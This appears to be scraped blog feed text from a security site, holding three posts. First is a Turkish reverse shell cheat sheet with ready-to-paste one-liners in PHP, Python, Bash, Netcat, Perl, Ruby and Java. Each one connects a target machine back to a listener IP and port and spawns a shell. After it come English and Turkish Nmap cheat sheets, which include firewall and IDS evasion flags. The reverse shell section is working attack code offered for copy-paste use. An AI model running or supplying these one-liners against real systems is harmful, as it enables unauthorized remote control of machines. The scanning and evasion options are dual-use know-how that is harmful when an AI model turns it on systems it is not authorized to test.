Komut çalıştırarak reverse shell almanıza imkan sağlayacak etken hedef makinada çalışan betik  dilleridir, en stabil şekillerini sizin için “kopyala/yapıştır” kullanabileceğiniz bir şablon halinde hazırladık.

Bu komutu hedef üzerinde çalıştırmadan önce istek yapacağınız portu Netcat dinlemeye almanız gerekmektedir.

nc -lvp [port]

nclvp

Aşağıdaki örneklerde 192.168.10.11 local IP ve 4545 ise dinleyeceğiniz local porttur

 


Php

php -r '$sock=fsockopen("192.168.10.11",4545);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4545));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash

bash -i &gt;&amp; /dev/tcp/192.168.10.11/4545 0&gt;&amp;1

Netcat

nc -e /bin/sh 192.168.10.11 4545

Perl

perl -e 'use Socket;$i="192.168.10.11";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'

Ruby

ruby -rsocket -e'f=TCPSocket.open("192.168.10.11",4545).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5&lt;&gt;/dev/tcp/192.168.10.11/4545;cat &lt;&amp;5 | while read line; do \$line 2&gt;&amp;5 &gt;&amp;5; done"] as String[])
p.waitFor()

TR | Reverse Shell Cheat Sheet Hakkı YÜCE

]]>
https://canyoupwn.me/tr-reverse-shell-cheat-sheet-2/feed/ 0
EN | Nmap Cheat Sheet https://canyoupwn.me/en-nmap-cheatsheet/ https://canyoupwn.me/en-nmap-cheatsheet/#respond Sun, 31 Jan 2016 18:37:06 +0000 http://canyoupwn.me/?p=101 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

What is Nmap? The software provides a number of features for probing computer networks, including host discovery and service and operating system detection. These features are extensible by scripts that provide more advanced service detection, vulnerability detection, and other features. Nmap is also capable of adapting to network conditions including latency and congestion during a […]

EN | Nmap Cheat Sheet Mustafa Kaan Demirhan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

What is Nmap?

The software provides a number of features for probing computer networks, including host discovery and service and operating system detection. These features are extensible by scripts that provide more advanced service detection, vulnerability detection, and other features. Nmap is also capable of adapting to network conditions including latency and congestion during a scan. Nmap is under development and refinement by its user community.

How to install Nmap?

In generally most linux deploy library have nmap so if you want use “sudo apt-get install nmap”  command or download the from nmap.org.

 

How to use Nmap?

  • Basic Scanning Techniques

Scan a single target;

nmap [target]

Scan multiple targets;

nmap [target1, target2, target3…]

Scan a list of targets;

nmap –iL [target.txt]

Scan a range of hosts

nmap [target-50]

Excluding targets from a scan;

nmap [target] --exclude [dışlanacak target]

Excluding targets using a list;

nmap [target] --exclude [Dışlanacaktarget.txt]

Scan an IPv6 target;

nmap -6 [target]

Scan random hosts;

nmap -iR [target sayısı]

Scan top 100 port;

nmap -F [target]

Disable reverse DNS resolution;

nmap -n [target]

For scanning depth (T0-T5);

nmap -T4 [target]
  • Discovery Options

Perform a ping scan only;

nmap -sP [target]

Perform a ping scan only and closing port scanning;

nmap -sn [target]

Don’t ping;

nmap -PN [target]

TCP SYN Ping;

nmap -PS [target]

TCP ACK Ping;

nmap -PA [target]

UDP Ping;

nmap -PU

ARP ping;

nmap -PR [target]

Create a host list;

nmap -SL

Disable DNS analysis;

nmap -n/-R [target]

Alternative DNS lookup;

nmap --system-dns [target]

Scan for port;

nmap -p [target]

Scan all ports;

nmap -p- [target]

Scan port ranges;

nmap -p 0-61

Perform a SYN scan only;

nmap -sS [target]

Perform a ACK scan only;

nmap -sA [target]

TCP window scan;

nmap -sW [target]

TCP scanning;

nmap -sT [target]

UDP scanning;

nmap -sU [target]

Detect OS;

nmap -O [target]

Detect OS and version analysis;

nmap -A [target]

Troubleshooting version scans;

nmap -sV [target]

ICMP echo ping;

nmap -PE [target]
  • Firewall Evasion Techniques

Fragment packets;

nmap -f [target]

Spoof MAC Address;

nmap --spoof-mac [MAC|0|vendor] [target]

Specify a specific MTU;

nmap -MTU [MTUdeğeri] [target]

IP spoofing;

nmap -D Spooflananip [target]

Send bad checksums;

nmap --badsum [target]

Append random data;

nmap --data-length [boyut] [target]
  • Nmap script kullanımı

Scan use to all scripts;

nmap -sC [target]

Use the starts “http” to scripts;

nmap --script "http*" [target]

Execute individual scripts;

nmap --script [scriptAdı] [target]

Execute scripts by category;

nmap --script [kategori] [target]

EN | Nmap Cheat Sheet Mustafa Kaan Demirhan

]]>
https://canyoupwn.me/en-nmap-cheatsheet/feed/ 0
TR | Nmap Cheat Sheet https://canyoupwn.me/tr-nmap-cheatsheet/ https://canyoupwn.me/tr-nmap-cheatsheet/#comments Sat, 30 Jan 2016 19:17:16 +0000 http://canyoupwn.me/?p=63 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Nmap Nedir? Nmap ağda işletim sistemi fark etmeksizin çalışan istemcilerin açık portlarını servis durumlarını işletim sistemlerini, sürüm bilgileri “etc/services” dosyasından aldığı port numarası ve sunucu servis listesiyle karşılaştırarak kullanıcıya sunar. Nmap/Zenmap Kurulumu Çoğu linux dağıtımında kendi kütüphanesinde bulunduğu için “sudo apt-get install nmap” komutu ile kurulumu yapabilirsiniz, yanıt alamazsanız nmap.org adresinden de kurulum yapabilirsiniz. Windows ortamında kullanmak için […]

TR | Nmap Cheat Sheet Mustafa Kaan Demirhan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Nmap Nedir?

Nmap ağda işletim sistemi fark etmeksizin çalışan istemcilerin açık portlarını servis durumlarını işletim sistemlerini, sürüm bilgileri “etc/services” dosyasından aldığı port numarası ve sunucu servis listesiyle karşılaştırarak kullanıcıya sunar.

Nmap/Zenmap Kurulumu

Çoğu linux dağıtımında kendi kütüphanesinde bulunduğu için “sudo apt-get install nmap” komutu ile kurulumu yapabilirsiniz, yanıt alamazsanız nmap.org adresinden de kurulum yapabilirsiniz.
Windows ortamında kullanmak için zenmap kurulumu yapabilrsiniz.

Nmap Kullanımı

Kullanım için kendimize bir dizilim belirlersek;

nmap [tarama türü] [opsiyonlar] [hedef tanımlama]

 

  • Port Tarama Sonuç İfadeleri;

Port açıksa;

Open

Port kapalıysa;

closed

Filtreleme var;

Filtered

ACK taramasında portlar erişilebilir fakat açık olmayada bilir;

Unfiltered

UDP, IP Protocol, FIN, NULL ve XMAS taramalarında portların açık veya filtreli olduğu tespit edilememiştir;

Open | Filtered

IDLE taraması için portların kapalı yada filtrelenmiş olduğu belirlenemedi ise;

Closed | Filtered

 

  • Basit Tarama Parametreleri

Tek hedef taramak için;

nmap [hedef]

Çoklu hedef taramak için;

nmap [hedef1, hedef2, hedef3…]

Dosyadaki hedef listesini taramak için;

nmap –iL [hedef.txt]

IP aralığını taramak için;

nmap [hedef-50]

Taramadan hedef çıkartarak tarama yapmak için;

nmap [hedef] --exclude [dışlanacak hedef]

Taramadan dosyadaki hedef listesi çıkartarak tarama yapmak için;

nmap [hedef] --exclude [DışlanacakHedef.txt]

IPv6 taraması yapmak için;

nmap -6 [hedef]

Rastgele Hedef taraması için;

nmap -iR [hedef sayısı]

Hızlı tarama yapmak için (top 100 port);

nmap -F [hedef]

Hedefin DNS bilgisini öğrenmek için;

nmap -n [hedef]

Tarama hızı/derinliği belirlemek için (T0-T5);

nmap -T4 [hedef]
  • Keşif Parametreleri

Sadece ping taraması için;

nmap -sP [hedef]

Ping taraması yaparken port taramasını kapatmak için;

nmap -sn [hedef]

Ping yollamadan tarama yapmak için(Ayakta olduğunu bildiğiniz halde yanıt alamadığımız makineler için önerilir);

nmap -PN [hedef]

TCP SYN Ping taraması için;

nmap -PS [hedef]

TCP ACK Ping taraması için;

nmap -PA [hedef]

UDP Ping taraması için;

nmap -PU

ARP ping taraması yapmak için;

nmap -PR [hedef]

Hedef listesi ve DNS isimlerini çıkartmak için;

nmap -SL

DNS çözümlemesi yapmadan tarama yapmak için;

nmap -n/-R [hedef]

İşletim sistemindeki DNS serverları kullanarak tarama için;

nmap -system-dns [hedef]

Port taraması yapmak için;

nmap -p [hedef]

Tüm portlarda tarama yapmak için;

nmap -p- [hedef]

Belli bir port aralığında tarama yapmak için;

nmap -p 0-61

SYN taraması yapmak için;

nmap -sS [hedef]

ACT taraması yapmak için;

nmap -sA [hedef]

Window taraması için;

nmap -sW [hedef]

TCP taraması için;

nmap -sT [hedef]

UDP taraması için;

nmap -sU [hedef]

Hedef de ki işletim sistemini öğrenmek için;

nmap -O [hedef]

İşletim sistemi ve versiyon analizi için;

nmap -A [hedef]

Açık portlar da ki çalışan servislerin sürümlerini öğrenmek için;

nmap -sV [hedef]

ICMP Echo Request paketleri ile tarama için;

nmap -PE [hedef]
  • Güvenlik Duvarı / IDS  Takılmadan Tarama Yapmak İçin Parametreler

Fragment paket taraması;

nmap -f [hedef]

MAC adresi aldatması yaparak tarama için;

nmap --spoof-mac [MAC|0|vendor] [hedef]

Yem kullanarak tarama yapmak için;

nmap -D RND: [sayı] [hedef]

Manuel olarak MTU değeri atamak için;

nmap -MTU [MTUdeğeri] [hedef]

IP aldatması için;

nmap -D Spooflananip [hedef]

Hatalı checksum paketleri yollamak için;

nmap --badsum [hedef]

Paket boyutlarını ayarlamak için;

nmap --data-length [boyut] [hedef]
  • Nmap script kullanımı

Tüm scriptler kullanarak yapılabilecek test için;

nmap -sC [hedef]

http ile başlayan scriptleri kullanmak için;

nmap --script "http*" [hedef]

Tek bir script ile tarama yapmak için;

nmap --script [scriptAdı] [hedef]

Bellirli bir kategorideki scriptleri kullanmak için;

nmap --script [kategori] [hedef]

 

TR | Nmap Cheat Sheet Mustafa Kaan Demirhan

]]>
https://canyoupwn.me/tr-nmap-cheatsheet/feed/ 1